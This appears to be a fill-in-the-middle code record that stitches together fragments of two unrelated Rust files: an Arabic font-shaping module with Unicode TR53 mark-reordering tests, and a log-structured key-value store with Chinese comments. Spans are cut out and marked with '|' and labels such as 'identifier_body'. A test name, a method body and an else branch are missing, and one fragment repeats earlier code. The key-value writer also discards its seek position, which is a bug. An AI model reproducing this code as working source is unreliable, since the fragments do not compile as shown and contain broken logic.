debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA BELOW
| '\u{0658}' // ARABIC MARK NOON GHUNNA
| '\u{06DC}' // ARABIC SMALL HIGH SEEN
| '\u{06E3}' // ARABIC SMALL LOW SEEN
| '\u{06E7}' // ARABIC SMALL HIGH YEH
| '\u{06E8}' // ARABIC SMALL HIGH NOON
| '\u{08CA}' // ARABIC SMALL HIGH FARSI YEH
| '\u{08CB}' // ARABIC SMALL HIGH YEH BARREE WITH TWO DOTS BELOW
| '\u{08CD}' // ARABIC SMALL HIGH ZAH
| '\u{08CE}' // ARABIC LARGE ROUND DOT ABOVE
| '\u{08CF}' // ARABIC LARGE ROUND DOT BELOW
| '\u{08D3}' // ARABIC SMALL LOW WAW
| '\u{08F3}' => true, // ARABIC SMALL HIGH WAW
_ => false,
}
}
#[cfg(test)]
mod tests {
use super::*;
// https://www.unicode.org/reports/tr53/#Demonstrating_AMTRA.
mod reorder_marks {
use super::*;
#[test]
fn | () {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0656}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}', '\u{0619}',
'\u{064F}', '\u{0650}', '\u{0656}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
// Variant of `test_artificial` where U+0656 is replaced with U+0655
// to test the reordering of MCM characters for the ccc = 220 group.
#[test]
fn test_artificial_custom() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0655}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0655}', '\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}',
'\u{0619}', '\u{064F}', '\u{0650}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
#[test]
fn test_example1() {
let cs1 = vec!['\u{0627}', '\u{064F}', '\u{0654}'];
let cs1_exp = vec!['\u{0627}', '\u{0654}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0627}', '\u{064F}', '\u{034F}', '\u{0654}'];
test_reorder_marks(&cs2, &cs2);
let cs3 = vec!['\u{0649}', '\u{0650}', '\u{0655}'];
let cs3_exp = vec!['\u{0649}', '\u{0655}', '\u{0650}'];
test_reorder_marks(&cs3, &cs3_exp);
let cs4 = vec!['\u{0649}', '\u{0650}', '\u{034F}', '\u{0655}'];
test_reorder_marks(&cs4, &cs4);
}
#[test]
fn test_example2a() {
let cs = vec!['\u{0635}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example2b() {
let cs1 = vec!['\u{0647}', '\u{0652}', '\u{06DC}'];
let cs1_exp = vec!['\u{0647}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0647}', '\u{0652}', '\u{034F}', '\u{06DC}'];
test_reorder_marks(&cs2, &cs2);
}
#[test]
fn test_example3() {
let cs1 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{06E7}'];
// The expected output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+06E7, U+0651]
//
// is incorrect, in that it fails to account for U+0651 Shadda moving to
// the front of U+0650 Kasra, per step 2a of AMTRA.
//
// U+06E7 Small High Yeh should then move to the front of Shadda per step
// 2b, resulting in:
let cs1_exp = vec!['\u{0640}', '\u{06E7}', '\u{0651}', '\u{0650}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{034F}', '\u{06E7}'];
// As above, Shadda should move to the front of Kasra, so the expected
// output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+0651, U+034F, U+06E7]
//
// (i.e. no changes) is also incorrect.
let cs2_exp = vec!['\u{0640}', '\u{0651}', '\u{0650}', '\u{034F}', '\u{06E7}'];
test_reorder_marks(&cs2, &cs2_exp);
}
#[test]
fn test_example4a() {
let cs = vec!['\u{0640}', '\u{0652}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example4b() {
let cs1 = vec!['\u{06C6}', '\u{064F}', '\u{06E8}'];
let cs1_exp = vec!['\u{06C6}', '\u{06E8}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{06C6}', '\u{064F}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs2, &cs2);
}
fn test_reorder_marks(cs: &Vec<char>, cs_exp: &Vec<char>) {
let mut cs_act = cs.clone();
reorder_marks(&mut cs_act);
assert_eq!(cs_exp, &cs_act);
}
}
}
| test_artificial | identifier_name |
arabic.rs | //! Implementation of font shaping for Arabic scripts
//!
//! Code herein follows the specification at:
//! <https://github.com/n8willis/opentype-shaping-documents/blob/master/opentype-shaping-arabic-general.md>
use crate::error::{ParseError, ShapingError};
use crate::gsub::{self, FeatureMask, GlyphData, GlyphOrigin, RawGlyph};
use crate::layout::{GDEFTable, LayoutCache, LayoutTable, GSUB};
use crate::tag;
use crate::unicode::mcc::{
modified_combining_class, sort_by_modified_combining_class, ModifiedCombiningClass,
};
use std::convert::From;
use unicode_joining_type::{get_joining_type, JoiningType};
#[derive(Clone)]
struct ArabicData {
joining_type: JoiningType,
feature_tag: u32,
}
impl GlyphData for ArabicData {
fn merge(data1: ArabicData, _data2: ArabicData) -> ArabicData {
// TODO hold off for future Unicode normalisation changes
data1
}
}
// Arabic glyphs are represented as `RawGlyph` structs with `ArabicData` for its `extra_data`.
type ArabicGlyph = RawGlyph<ArabicData>;
impl ArabicGlyph {
fn is_transparent(&self) -> bool {
self.extra_data.joining_type == JoiningType::Transparent || self.multi_subst_dup
}
fn is_left_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::LeftJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn is_right_joining(&self) -> bool {
self.extra_data.joining_type == JoiningType::RightJoining
|| self.extra_data.joining_type == JoiningType::DualJoining
|| self.extra_data.joining_type == JoiningType::JoinCausing
}
fn feature_tag(&self) -> u32 {
self.extra_data.feature_tag
}
fn set_feature_tag(&mut self, feature_tag: u32) |
}
impl From<&RawGlyph<()>> for ArabicGlyph {
fn from(raw_glyph: &RawGlyph<()>) -> ArabicGlyph {
// Since there's no `Char` to work out the `ArabicGlyph`s joining type when the glyph's
// `glyph_origin` is `GlyphOrigin::Direct`, we fallback to `JoiningType::NonJoining` as
// the safest approach
let joining_type = match raw_glyph.glyph_origin {
GlyphOrigin::Char(c) => get_joining_type(c),
GlyphOrigin::Direct => JoiningType::NonJoining,
};
ArabicGlyph {
unicodes: raw_glyph.unicodes.clone(),
glyph_index: raw_glyph.glyph_index,
liga_component_pos: raw_glyph.liga_component_pos,
glyph_origin: raw_glyph.glyph_origin,
small_caps: raw_glyph.small_caps,
multi_subst_dup: raw_glyph.multi_subst_dup,
is_vert_alt: raw_glyph.is_vert_alt,
fake_bold: raw_glyph.fake_bold,
fake_italic: raw_glyph.fake_italic,
variation: raw_glyph.variation,
extra_data: ArabicData {
joining_type,
// For convenience, we loosely follow the spec (`2. Computing letter joining
// states`) here by initialising all `ArabicGlyph`s to `tag::ISOL`
feature_tag: tag::ISOL,
},
}
}
}
impl From<&ArabicGlyph> for RawGlyph<()> {
fn from(arabic_glyph: &ArabicGlyph) -> RawGlyph<()> {
RawGlyph {
unicodes: arabic_glyph.unicodes.clone(),
glyph_index: arabic_glyph.glyph_index,
liga_component_pos: arabic_glyph.liga_component_pos,
glyph_origin: arabic_glyph.glyph_origin,
small_caps: arabic_glyph.small_caps,
multi_subst_dup: arabic_glyph.multi_subst_dup,
is_vert_alt: arabic_glyph.is_vert_alt,
fake_bold: arabic_glyph.fake_bold,
variation: arabic_glyph.variation,
fake_italic: arabic_glyph.fake_italic,
extra_data: (),
}
}
}
pub fn gsub_apply_arabic(
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
raw_glyphs: &mut Vec<RawGlyph<()>>,
) -> Result<(), ShapingError> {
match gsub_table.find_script(script_tag)? {
Some(s) => {
if s.find_langsys_or_default(lang_tag)?.is_none() {
return Ok(());
}
}
None => return Ok(()),
}
let arabic_glyphs = &mut raw_glyphs.iter().map(ArabicGlyph::from).collect();
// 1. Compound character composition and decomposition
apply_lookups(
FeatureMask::CCMP,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
// 2. Computing letter joining states
{
let mut previous_i = arabic_glyphs
.iter()
.position(|g| !g.is_transparent())
.unwrap_or(0);
for i in (previous_i + 1)..arabic_glyphs.len() {
if arabic_glyphs[i].is_transparent() {
continue;
}
if arabic_glyphs[previous_i].is_left_joining() && arabic_glyphs[i].is_right_joining() {
arabic_glyphs[i].set_feature_tag(tag::FINA);
match arabic_glyphs[previous_i].feature_tag() {
tag::ISOL => arabic_glyphs[previous_i].set_feature_tag(tag::INIT),
tag::FINA => arabic_glyphs[previous_i].set_feature_tag(tag::MEDI),
_ => {}
}
}
previous_i = i;
}
}
// 3. Applying the stch feature
//
// TODO hold off for future generalised solution (including the Syriac Abbreviation Mark)
// 4. Applying the language-form substitution features from GSUB
const LANGUAGE_FEATURES: &[(FeatureMask, bool)] = &[
(FeatureMask::LOCL, true),
(FeatureMask::ISOL, false),
(FeatureMask::FINA, false),
(FeatureMask::MEDI, false),
(FeatureMask::INIT, false),
(FeatureMask::RLIG, true),
(FeatureMask::RCLT, true),
(FeatureMask::CALT, true),
];
for &(feature_mask, is_global) in LANGUAGE_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|g, feature_tag| is_global || g.feature_tag() == feature_tag,
)?;
}
// 5. Applying the typographic-form substitution features from GSUB
//
// Note that we skip `GSUB`'s `DLIG` and `CSWH` features as results would differ from other
// Arabic shapers
const TYPOGRAPHIC_FEATURES: &[FeatureMask] = &[FeatureMask::LIGA, FeatureMask::MSET];
for &feature_mask in TYPOGRAPHIC_FEATURES {
apply_lookups(
feature_mask,
gsub_cache,
gsub_table,
gdef_table,
script_tag,
lang_tag,
arabic_glyphs,
|_, _| true,
)?;
}
// 6. Mark reordering
//
// Handled in the text preprocessing stage.
*raw_glyphs = arabic_glyphs.iter().map(RawGlyph::from).collect();
Ok(())
}
fn apply_lookups(
feature_mask: FeatureMask,
gsub_cache: &LayoutCache<GSUB>,
gsub_table: &LayoutTable<GSUB>,
gdef_table: Option<&GDEFTable>,
script_tag: u32,
lang_tag: Option<u32>,
arabic_glyphs: &mut Vec<ArabicGlyph>,
pred: impl Fn(&ArabicGlyph, u32) -> bool + Copy,
) -> Result<(), ParseError> {
let index = gsub::get_lookups_cache_index(gsub_cache, script_tag, lang_tag, feature_mask)?;
let lookups = &gsub_cache.cached_lookups.borrow()[index];
for &(lookup_index, feature_tag) in lookups {
gsub::gsub_apply_lookup(
gsub_cache,
gsub_table,
gdef_table,
lookup_index,
feature_tag,
None,
arabic_glyphs,
0,
arabic_glyphs.len(),
|g| pred(g, feature_tag),
)?;
}
Ok(())
}
/// Reorder Arabic marks per AMTRA. See: https://www.unicode.org/reports/tr53/.
pub(super) fn reorder_marks(cs: &mut [char]) {
sort_by_modified_combining_class(cs);
for css in
cs.split_mut(|&c| modified_combining_class(c) == ModifiedCombiningClass::NotReordered)
{
reorder_marks_shadda(css);
reorder_marks_other_combining(css, ModifiedCombiningClass::Above);
reorder_marks_other_combining(css, ModifiedCombiningClass::Below);
}
}
fn reorder_marks_shadda(cs: &mut [char]) {
use std::cmp::Ordering;
// 2a. Move any Shadda characters to the beginning of S, where S is a max
// length substring of non-starter characters.
fn comparator(c1: &char, _c2: &char) -> Ordering {
if modified_combining_class(*c1) == ModifiedCombiningClass::CCC33 {
Ordering::Less
} else {
Ordering::Equal
}
}
cs.sort_by(comparator)
}
fn reorder_marks_other_combining(cs: &mut [char], mcc: ModifiedCombiningClass) {
debug_assert!(mcc == ModifiedCombiningClass::Below || mcc == ModifiedCombiningClass::Above);
// Get the start index of a possible sequence of characters with canonical
// combining class equal to `mcc`. (Assumes that `glyphs` is normalised to
// NFD.)
let first = cs.iter().position(|&c| modified_combining_class(c) == mcc);
if let Some(first) = first {
// 2b/2c. If the sequence of characters _begins_ with any MCM characters,
// move the sequence of such characters to the beginning of S.
let count = cs[first..]
.iter()
.take_while(|&&c| is_modifier_combining_mark(c))
.count();
cs[..(first + count)].rotate_right(count);
}
}
fn is_modifier_combining_mark(ch: char) -> bool {
// https://www.unicode.org/reports/tr53/tr53-6.html#MCM
match ch {
| '\u{0654}' // ARABIC HAMZA ABOVE
| '\u{0655}' // ARABIC HAMZA BELOW
| '\u{0658}' // ARABIC MARK NOON GHUNNA
| '\u{06DC}' // ARABIC SMALL HIGH SEEN
| '\u{06E3}' // ARABIC SMALL LOW SEEN
| '\u{06E7}' // ARABIC SMALL HIGH YEH
| '\u{06E8}' // ARABIC SMALL HIGH NOON
| '\u{08CA}' // ARABIC SMALL HIGH FARSI YEH
| '\u{08CB}' // ARABIC SMALL HIGH YEH BARREE WITH TWO DOTS BELOW
| '\u{08CD}' // ARABIC SMALL HIGH ZAH
| '\u{08CE}' // ARABIC LARGE ROUND DOT ABOVE
| '\u{08CF}' // ARABIC LARGE ROUND DOT BELOW
| '\u{08D3}' // ARABIC SMALL LOW WAW
| '\u{08F3}' => true, // ARABIC SMALL HIGH WAW
_ => false,
}
}
#[cfg(test)]
mod tests {
use super::*;
// https://www.unicode.org/reports/tr53/#Demonstrating_AMTRA.
mod reorder_marks {
use super::*;
#[test]
fn test_artificial() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0656}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}', '\u{0619}',
'\u{064F}', '\u{0650}', '\u{0656}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
// Variant of `test_artificial` where U+0656 is replaced with U+0655
// to test the reordering of MCM characters for the ccc = 220 group.
#[test]
fn test_artificial_custom() {
let cs = vec![
'\u{0618}', '\u{0619}', '\u{064E}', '\u{064F}', '\u{0654}', '\u{0658}', '\u{0653}',
'\u{0654}', '\u{0651}', '\u{0655}', '\u{0651}', '\u{065C}', '\u{0655}', '\u{0650}',
];
let cs_exp = vec![
'\u{0655}', '\u{0654}', '\u{0658}', '\u{0651}', '\u{0651}', '\u{0618}', '\u{064E}',
'\u{0619}', '\u{064F}', '\u{0650}', '\u{065C}', '\u{0655}', '\u{0653}', '\u{0654}',
];
test_reorder_marks(&cs, &cs_exp);
}
#[test]
fn test_example1() {
let cs1 = vec!['\u{0627}', '\u{064F}', '\u{0654}'];
let cs1_exp = vec!['\u{0627}', '\u{0654}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0627}', '\u{064F}', '\u{034F}', '\u{0654}'];
test_reorder_marks(&cs2, &cs2);
let cs3 = vec!['\u{0649}', '\u{0650}', '\u{0655}'];
let cs3_exp = vec!['\u{0649}', '\u{0655}', '\u{0650}'];
test_reorder_marks(&cs3, &cs3_exp);
let cs4 = vec!['\u{0649}', '\u{0650}', '\u{034F}', '\u{0655}'];
test_reorder_marks(&cs4, &cs4);
}
#[test]
fn test_example2a() {
let cs = vec!['\u{0635}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example2b() {
let cs1 = vec!['\u{0647}', '\u{0652}', '\u{06DC}'];
let cs1_exp = vec!['\u{0647}', '\u{06DC}', '\u{0652}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0647}', '\u{0652}', '\u{034F}', '\u{06DC}'];
test_reorder_marks(&cs2, &cs2);
}
#[test]
fn test_example3() {
let cs1 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{06E7}'];
// The expected output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+06E7, U+0651]
//
// is incorrect, in that it fails to account for U+0651 Shadda moving to
// the front of U+0650 Kasra, per step 2a of AMTRA.
//
// U+06E7 Small High Yeh should then move to the front of Shadda per step
// 2b, resulting in:
let cs1_exp = vec!['\u{0640}', '\u{06E7}', '\u{0651}', '\u{0650}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{0640}', '\u{0650}', '\u{0651}', '\u{034F}', '\u{06E7}'];
// As above, Shadda should move to the front of Kasra, so the expected
// output in https://www.unicode.org/reports/tr53/#Example3
//
// [U+0640, U+0650, U+0651, U+034F, U+06E7]
//
// (i.e. no changes) is also incorrect.
let cs2_exp = vec!['\u{0640}', '\u{0651}', '\u{0650}', '\u{034F}', '\u{06E7}'];
test_reorder_marks(&cs2, &cs2_exp);
}
#[test]
fn test_example4a() {
let cs = vec!['\u{0640}', '\u{0652}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs, &cs);
}
#[test]
fn test_example4b() {
let cs1 = vec!['\u{06C6}', '\u{064F}', '\u{06E8}'];
let cs1_exp = vec!['\u{06C6}', '\u{06E8}', '\u{064F}'];
test_reorder_marks(&cs1, &cs1_exp);
let cs2 = vec!['\u{06C6}', '\u{064F}', '\u{034F}', '\u{06E8}'];
test_reorder_marks(&cs2, &cs2);
}
fn test_reorder_marks(cs: &Vec<char>, cs_exp: &Vec<char>) {
let mut cs_act = cs.clone();
reorder_marks(&mut cs_act);
assert_eq!(cs_exp, &cs_act);
}
}
}
| {
self.extra_data.feature_tag = feature_tag
} | identifier_body |
kv.rs | //! 通过 [indexmap](https://github.com/bluss/indexmap) 实现简单的 KV 数据库
//! 为了防止 data race,将 IndexMap 用 Arc 进行包装
//! 具体实现可以参考:https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/src/kv.rs
use super::util::HandyRwLock;
use crate::{KvsError, Result};
use indexmap::IndexMap;
use serde::{Deserialize, Serialize};
use serde_json::Deserializer;
use std::{
collections::{BTreeMap, HashMap},
ffi::OsStr,
fs::File,
io::{BufReader, BufWriter, Read, Seek, SeekFrom, Write},
ops::Range,
path::{Path, PathBuf},
sync::{Arc, RwLock},
};
/// 键值对存储在日志文件中 todo
struct KVStore {
/// 当将键设置为值时,kvs 将 set 命令写入硬盘中的有序日志中,
/// 然后将该日志对应的指针(文件偏移量)指向键和内容,并存储在内存索引中。
/// 类似地,当删除一个键时,kvs 将 rm 命令写入日志,然后从内存索引中删除该键。
/// 当使用 get 命令检索键的值时,它检索索引,如果找到了,就从对应的日志指针上加载命令,执行命令并返回结果。
///
/// kvs 启动时,就会按从旧到新的顺序从日志中遍历并执行命令,内存索引也会对应的重建。
///
/// 当日志条数达到给定阈值时,kvs 会其压缩为一个新日志,删除冗余日志以回收磁盘空间。
///
/// 注意,kvs 项目既是一个无状态命令行程序,也是一个包含有状态 KVStore 类型的库:
/// 对于 CLI,使用 KVStore 类型将加载索引,执行命令,然后退出;对于库使用,它将加载索引,然后执行多个命令,维护索引状态,直到它被删除。
/// ref: https://github.com/pingcap/talent-plan/blob/master/courses/rust/projects/project-2/README.md#project-spec
path: PathBuf,
// 数字到文件的映射
readers: HashMap<u64, BufReaderWithPos<File>>,
// 当前用于写的日志文件
writer: BufWriterWithPos<File>,
// 存在内存中的索引
index: BTreeMap<String, CommandPos>,
// inner: Arc<RwLock<IndexMap<Vec<u8>, Vec<u8>>>>,
/// 记录当前所写入的文件标号
current_gen: u64,
/// 记录过期/无效的(可被删除的)值的字节数量
uncompacted: u64,
}
#[derive(Debug)]
struct BufWriterWithPos<W: Write + Seek> {
writer: BufWriter<W>,
pos: u64,
}
impl<W: Write + Seek> BufWriterWithPos<W> {
fn new(mut inner: W) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0));
Ok(BufWriterWithPos {
writer: BufWriter::new(inner),
pos: 0,
})
}
}
impl<W: Write + Seek> Write for BufWriterWithPos<W> {
fn write(&mut self, buf: &[u8]) -> std::io::Result<usize> {
let len = self.writer.write(buf)?;
self.pos += len as u64;
Ok(len)
}
fn flush(&mut self) -> std::io::Result<()> {
self.writer.flush()
}
}
struct BufReaderWithPos<R: Read + Seek> {
reader: BufReader<R>,
pos: u64,
}
impl<R: Read + Seek> BufReaderWithPos<R> {
fn new(mut inner: R) -> Result<Self> {
let pos = inner.seek(SeekFrom::Current(0))?;
Ok(BufReaderWithPos {
reader: BufReader::new(inner),
pos,
})
}
}
// 将目录中的文件列表按名字进行排序,以便得到有序的日志文件列表
fn sorted_gen_list(path: PathBuf) -> Result<Vec<u64>> {
let mut gen_list: Vec<u64> = std::fs::read_dir(&path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file() && path.extension() == Some("log".as_ref()))
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.trim_end_matches(".log"))
.map(str::parse::<u64>)
})
.flatten()
.collect();
gen_list.sort_unstable();
Ok(gen_list)
}
fn log_path(dir: &Path, gen: u64) -> PathBuf {
dir.join(format!("{}.log", gen))
}
/// 通过文件序号,从对应的文件中读取指令并生成对应的索引加载到内存中(BTreeMap)
fn load(
gen: u64,
reader: &mut BufReaderWithPos<File>,
index: &mut BTreeMap<String, CommandPos>,
) -> Result<u64> {
// 确定从文件的某个位置开始读
let mut pos = reader.seek(SeekFrom::Start(0))?;
let mut stream = Deserializer::from_reader(reader).into_iter::<Command>();
// 通过压缩的手段可节省的字节数
let mut uncompacted = 0;
while let Some(cmd) = stream.next() {
// 匹配到下一条指令所对应的 offset
let new_pos = stream.byte_offset() as u64;
match cmd? {
Command::Set { key, .. } => {
if let Some(old_cmd) = index.insert(key, (gen, pos..new_pos).into()) {
uncompacted += old_cmd.len;
}
}
// 删除
Command::Remove { key } => {
if let Some(old_cmd) = index.remove(&key) {
uncompacted += old_cmd.len;
}
// 为何加上了指令的长度?todo
uncompacted += new_pos - pos;
}
}
pos = new_pos;
}
Ok(uncompacted)
}
#[derive(Debug, Deserialize, Serialize)]
enum Command {
Set { key: String, value: String },
Remove { key: String },
}
/// 定义支持的指令/日志
impl Command {
fn set(key: String, value: String) -> Self {
Command::Set { key, value }
}
fn remove(key: String) -> Self {
Command::Remove { key }
}
}
/// 命令位置
#[derive(Debug)]
struct CommandPos {
/// 日志文件序号
gen: u64,
/// 日志在一个文件中的偏移量
pos: u64,
/// 日志的长度。一个指令就算是一条日志
len: u64,
}
impl From<(u64, Range<u64>)> for CommandPos {
fn from((gen, range): (u64, Range<u64>)) -> Self {
CommandPos {
gen,
pos: range.start,
len: range.end - range.start,
}
}
}
impl<R: Seek + Read> Seek for BufReaderWithPos<R> {
fn seek(&mut self, pos: SeekFrom) -> std::io::Result<u64> {
self.pos = self.reader.seek(pos)?;
Ok(self.pos)
}
}
impl<R: Seek + Read> Read for BufReaderWithPos<R> {
fn read(&mut self, buf: &mut [u8]) -> std::io::Result<usize> {
let len = self.reader.read(buf)?;
self.pos += len as u64;
Ok(len)
}
}
impl KVStore {
/// 基于一个路径启动一个 KvStore 实例。
/// 如果路径不存在,则创建
fn open(path: impl Into<PathBuf>) -> Result<Self> {
// 打开目录,查看目录中的日志文件列表,将其加载进 kvs
let using_path = path.into();
std::fs::create_dir_all(&using_path)?;
let mut readers = HashMap::new();
// 索引以 btree map 的形式存储在内存中
let mut index: BTreeMap<String, CommandPos> = BTreeMap::new();
let gen_list = sorted_gen_list(using_path.clone())?;
let mut uncompacted = 0;
for &gen in &gen_list {
let mut reader = BufReaderWithPos::new(File::open(log_path(&using_path, gen))?)?;
uncompacted += load(gen, &mut reader, &mut index)?;
readers.insert(gen, reader);
}
let current_gen = gen_list.last().unwrap_or(&0) + 1;
let writer = new_log_file(&using_path, current_gen, &mut readers)?;
Ok(KVStore {
path: using_path.clone(),
readers,
writer,
index,
current_gen,
uncompacted,
})
}
/// 设定键值对
/// 1.序列化指令,刷入文件中;2.索引写入内存
fn set(&mut self, k: String, v: String) -> Result<()> {
let cmd = Command::set(k, v);
let pos = self.writer.pos;
serde_json::to_writer(&mut self.writer, &cmd)?;
self.writer.flush()?;
// 索引写入内存 todo
if let Command::Set { key, .. } = cmd {
if let Some(old_cmd) = self
.index
.insert(key, (self.current_gen, pos..self.writer.pos).into())
{
self.uncompacted += old_cmd.len;
}
}
Ok(())
}
/// 读取值
/// 如果key存在则返回值,不存在,返回 None
fn get(&mut self, k: String) -> Result<Option<String>> {
if let Some(cmd_pos) = self.index.get(&k) {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("Cannot find log reader");
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
let cmd_reader = reader.take(cmd_pos.len);
if let Command::Set { value, .. } = serde_json::from_reader(cmd_reader)? {
Ok(Some(value)) | Err(KvsError::UnsupportCmdType)
}
} else {
Ok(None)
}
}
/// 查询 key 是否存在,如果存在,则记录 cmd 到日志,然后删除文件中的数据,再索引索引
fn delete(&mut self, k: String) -> Result<()> {
if self.index.contains_key(&k) {
let rm_cmd = Command::remove(k.clone());
serde_json::to_writer(&mut self.writer, &rm_cmd)?;
self.writer.flush()?;
if let Command::Remove { key } = rm_cmd {
let old_cmd = self.index.remove(&key).expect("rm key error.");
self.uncompacted += old_cmd.len;
}
Ok(())
} else {
Err(KvsError::KeyNotFound)
}
}
/// 压缩过期的不必要的数据指令
fn compact(&mut self) -> Result<()> {
let compaction_gen = self.current_gen + 1;
self.current_gen += 2;
self.writer = self.new_log_file(self.current_gen)?;
let mut compaction_writer = self.new_log_file(compaction_gen)?;
let mut new_pos = 0;
for cmd_pos in &mut self.index.values_mut() {
let reader = self
.readers
.get_mut(&cmd_pos.gen)
.expect("cann't find log reader");
if reader.pos != cmd_pos.pos {
reader.seek(SeekFrom::Start(cmd_pos.pos))?;
}
let mut entry_reader = reader.take(cmd_pos.len);
let len = std::io::copy(&mut entry_reader, &mut compaction_writer)?;
*cmd_pos = (compaction_gen, new_pos..new_pos + len).into();
new_pos += len;
}
compaction_writer.flush()?;
// 删除过期的日志文件
let stale_gens: Vec<_> = self
.readers
.keys()
.filter(|&&gen| gen < compaction_gen)
.cloned()
.collect();
for stale_gen in stale_gens {
self.readers.remove(&stale_gen);
std::fs::remove_file(log_path(&self.path, stale_gen))?;
}
self.uncompacted = 0;
Ok(())
}
fn new_log_file(&mut self, gen: u64) -> Result<BufWriterWithPos<File>> {
new_log_file(&self.path, gen, &mut self.readers)
}
}
// 读取一个目录下的文件
fn read_dir(path: &str) -> Result<Vec<String>> {
// Rust 实现浏览文件
let dirs: Vec<String> = std::fs::read_dir(path)?
.flat_map(|res| -> Result<_> { Ok(res?.path()) })
.filter(|path| path.is_file())
.flat_map(|path| {
path.file_name()
.and_then(OsStr::to_str)
.map(|s| s.to_string())
})
.collect();
dbg!(&dirs);
Ok(dirs)
}
fn create_dir(path: &str) -> Result<bool> {
std::fs::create_dir_all(path)?;
Ok(true)
}
/// 日志文件的创建
fn new_log_file(
path: &Path,
gen: u64,
readers: &mut HashMap<u64, BufReaderWithPos<File>>,
) -> Result<BufWriterWithPos<File>> {
let path = log_path(&path, gen);
let writer = BufWriterWithPos::new(
std::fs::OpenOptions::new()
.create(true)
.write(true)
.append(true)
.open(&path)?,
)?;
readers.insert(gen, BufReaderWithPos::new(File::open(&path)?)?);
Ok(writer)
}
#[cfg(test)]
mod tests {
use std::{fmt::Result, str::FromStr};
use super::*;
#[test]
fn test_store1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".into();
st.set(cache_key.clone(), "hello org".to_string());
assert_eq!(st.get(cache_key.to_string()).unwrap(), Some("hello org".to_string()));
}
#[test]
fn test_load1() {
let mut st = KVStore::open("./data").expect("kvstore init error.");
let cache_key: String = "org_1001_info".to_string();
dbg!(st.get(cache_key.to_string()).unwrap());
}
#[test]
// fn test_store_delete() {
// let mut st = KVStore::new();
// let cache_key: Vec<u8> = "org_1001_info".as_bytes().into();
// st.set(cache_key.clone(), "hello org".as_bytes().into());
// assert_eq!(st.delete(&cache_key), Some("hello org".as_bytes().into()));
// assert_eq!(st.get(&cache_key), None);
// }
#[test]
fn test_sorted_gen_list() {
let res = sorted_gen_list(PathBuf::from("./"));
dbg!(&res);
}
#[test]
fn test_serde() {
